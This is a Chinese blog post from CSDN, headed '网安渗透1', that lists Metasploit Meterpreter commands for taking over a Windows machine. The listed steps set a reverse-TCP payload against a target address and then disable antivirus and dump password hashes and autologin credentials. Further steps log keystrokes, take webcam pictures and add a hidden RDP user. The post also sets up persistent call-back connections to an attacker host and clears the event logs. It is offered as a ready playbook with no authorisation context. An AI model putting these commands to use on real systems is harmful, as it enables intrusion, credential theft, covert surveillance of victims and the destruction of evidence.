网安渗透1

已于 2024-04-10 18:14:56 修改
阅读量241 收藏 3
点赞数 3
分类专栏: 网安 文章标签: 网络
于 2024-04-10 18:13:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72735063/article/details/137605972
版权

渗透命令大全

use 0

set payload windows/x64/meterpreter/reverse_tcp

set rhosts 192.168.132.32

run

后执行下面

chcp 65001                                         #shell 编码乱码

run post/windows/manage/migrate                    #自动进程迁移    

run post/windows/gather/checkvm                    #查看目标主机是否运行在虚拟机上    

run post/windows/manage/killav                     #关闭杀毒软件    

run post/windows/manage/enable_rdp                 #开启远程桌面服务    

run post/windows/manage/autoroute                  #查看路由信息    

run post/windows/gather/enum_logged_on_users       #列举当前登录的用户    

run post/windows/gather/enum_applications          #列举应用程序    

run windows/gather/credentials/windows_autologin   #抓取自动登录的用户名和密码    

run windows/gather/smart_hashdump                  #dump出所有用户的hash

clearev                                            #清除事件日志

sysinfo                #查看目标主机系统信息

run scraper            #查看目标主机详细信息

run hashdump           #导出密码的哈希

load kiwi             #加载

ps                    #查看目标主机进程信息

pwd                 #查看目标当前目录(windows)

getlwd                #查看目标当前目录(Linux)

search -f *.jsp -d e:\                  #搜索E盘中所有以.jsp为后缀的文件

download  e:\test.txt  /root            #将目标机的e:\test.txt文件下载到/root目录下

upload    /root/test.txt d:\test       #/root/test.txt上传到目标机的 d:\test\ 目录下

getpid                 #查看当前Meterpreter Shell的进程

PIDmigrate 1384                                             #将当前Meterpreter Shell的进程迁移到PID1384的进程上

idletime               #查看主机运行时间

getuid                #查看获取的当前权限

getsystem             #提权

run  killav           #关闭杀毒软件

screenshot            #截图

webcam_list           #查看目标主机的摄像头

webcam_snap           #拍照

webcam_stream         #开视频

execute  参数  -f 可执行文件       #执行可执行程序

run getgui -u hack -p 123        #创建hack用户,密码为123

run getgui -e                       #开启远程桌面

keyscan_start                  #开启键盘记录功能

keyscan_dump                   #显示捕捉到的键盘记录信息

keyscan_stop                     #停止键盘记录功能

uictl  disable  keyboard       #禁止目标使用键盘

uictl  enable   keyboard       #允许目标使用键盘

uictl  disable  mouse          #禁止目标使用鼠标

uictl  enable   mouse          #允许目标使用鼠标

load                          #使用扩展库

run                 #使用扩展库

run persistence -X -i 5 -p 8888 -r 192.168.10.27  #反弹时间间隔是5s 会自动连接

portfwd add -l 3389 -r 192.168.11.13 -p 3389      #192.168.11.133389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址

clearev                        #清除日志

白天的我最菜
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
白蚁网安渗透工具
04-25
白蚁网安渗透工具是专门为此目的设计的一套软件,帮助网络安全专业人员模拟黑客行为,查找潜在的安全漏洞。 标题中的"白蚁网安渗透工具"指的是一个可能包含多种功能的综合工具集,用于执行渗透测试的不同阶段。...
蚁景网安渗透测试学习路径图最新.pdf
06-22
蚁景网安渗透测试学习路径图最新.pdf 本文档提供了一个详细的学习路径图,涵盖了从基本的 Linux 操作系统到高级的渗透测试和免杀技术。以下是对该文档中涉及的知识点的详细解释: Linux 基础 * 安装 VMware ...
网安渗透】本地搭建外贸网站模拟渗透 —小记
Keylion ,Your Hero
06-24 727
本地使用的是windows 2008 R2 服务器,IIS 部署了一个外贸网站。 物理机通过IP即可访问该网站,尽量贴近实战。 下面开始进入正文: Author: Keylion —> 一次渗透过程记录 Date: 2018.6.24 1. 信息收集 使用AWV扫描网站后,得到以下信息: 图-1 AWVS扫描结果 ↓ 图-2 AWVS扫描结果↓ ...
网安&渗透&安服 电脑 环境 配置 一文全
GODV的博客
10-26 1291
又重装电脑了,经常重装,每一次都很烦,都需要浪费大量时间,不能总在一个地方吃亏,写个文章记录一下,渗透测试人员的电脑如何配置
网安学习-内网渗透2
weixin_44770698的博客
07-29 815
网络安全学习-内网渗透2
一个完整的网安渗透学习路线是怎样的?如何成为安全渗透工程师?_网安大几学渗透(2)
2401_84545291的博客
05-13 566
Kali Linux介绍Kali Linux的前世今生Linux常用命令介绍Kali工具集介绍修改Kali源和更新软件Kali常用配置和基本使用Kali启动root用户先想清楚自己对哪个行业更感兴趣,结合自己的兴趣、性格特征、能力强项去寻找适合自己的职业赛道。这个不仅仅是去看网上别人怎么选的,因为每个人的情况毕竟是不一样的,别人的选择不能适用于你。
网安渗透测试教程(非常详细),0基础从入门到精通,看完这一篇就够了!
weixin_57514792的博客
03-18 755
渗透测试教程(入门到精通)
[网安实践III] 实验1.渗透测试实验
LostUnravel的博客
11-09 5959
网安实践III - 实验1.渗透测试1 你的攻击机IP和靶机IP2 同组同学的姓名,同组同学的靶机msfadmin的密码,root的密码3 你是如何发现漏洞的?请写出发现漏洞的过程4 攻击利用的漏洞,以及攻击的过程。(写到如何获得shadow文件即可)5 获得靶机的shadow文件中msfadmin账号和root账号的内容6 靶机的msfadmin用户的密码,以及破解过程msfadmin密码破解过程7 靶机的root密码,以及破解过程root密码破解过程8 攻击流量包提交 1 你的攻击机IP和靶机IP 攻
网安学习-内网渗透3
weixin_44770698的博客
07-30 5199
网安学习-内网渗透3(单纯记录学习思路)
网安入门——渗透基础知识了解
Python栈
02-28 1380
1、Kali Linux:源于BTS,基于Debian Linux开发的操作系统,集成了不同作者编写的不同黑客(安全审计)工具。1、定义:信息系统中存在的缺陷或不恰当的配置,可以使攻击者在未授权情况下访问或破坏系统,导致信息系统面临安全风险。前期交互(了解需求、必须获得授权,授权后仍需向公安部门报备、工具合法)、2、渗透代码:利用安全漏洞来来造成入侵或破坏效果的程序(eg:病毒)4、披露方式:完全公开披露、负责人公开披露、进入黑客产业链(暗网)3、职业:渗透测试工程师、网安工程师、黑客(最赚钱but孤独)
软件测试VS网络安全渗透测试,聊聊软测转网安渗透测试那些事儿_软件测试属于安全领域
2401_84564150的博客
05-13 709
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**👈​。
「小明赠书活动」第五期“网安三剑客”套系图书《内网渗透技术》《渗透测试技术》《Web应用安全》
热门推荐
小明的Java问道之路
06-04 2万+
人民邮电出版社异步图书与安恒信息合作出版的“网安三剑客”套系图书《内网渗透技术》《渗透测试技术》《Web应用安全》。
红尘网安445渗透工具包
12-30
【红尘网安445渗透工具包】是一款专门针对网络安全隐患进行测试和评估的工具集,主要用于检测和利用445端口上的潜在漏洞。445端口是Microsoft的SMB(Server Message Block)服务使用的端口,用于文件共享、打印服务...
1+X网安题目整理.docx
11-28
网安题目整理 网安是一种非常重要的安全机制,在今天的网络环境中,对于保护网络安全和数据安全起着至关重要的作用。在这篇文章中,我们将对网安的基本概念、网安的类型、网安的应用场景、网安的攻击方式和防御方法...
第7次网安实验1
08-04
网络安全实验】第七次实验1主要关注了企业环境中的一些常见安全漏洞及利用方式,涉及到Web应用的安全性,如WordPress的漏洞利用,以及网络服务如Redis和FFmpeg的安全问题。以下是这些知识点的详细说明: 1. **...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 243
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
最新发布
jjjxxxhhh123的博客
07-27 615
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
网络编程套接字socket
安权_code的博客
07-23 950
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
H3C与VPN高级应用(七)深入探讨H3C防火墙与VPN高级应用
洛秋的博客
07-23 1109
IPSec(Internet Protocol Security)是一种用于保护IP通信的协议,通过对数据包进行加密和认证来确保数据的机密性、完整性和真实性。IPSec VPN通常用于建立安全的远程连接,保护企业内部网络与远程办公或分支机构之间的数据通信。NAT(Network Address Translation)是一种将私有IP地址转换为公共IP地址的技术,通常用于多个设备共享一个公共IP地址访问互联网。NAT有助于节约公共IP地址,同时增强内部网络的安全性。
github网安项目
04-24
1. OWASP(开放式Web应用程序安全项目):OWASP是一个致力于提高Web应用程序安全性的国际组织。他们在GitHub上维护了一系列开源项目,包括安全工具、漏洞测试和安全指南等。 2. Metasploit:Metasploit是一个广泛...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白天的我最菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值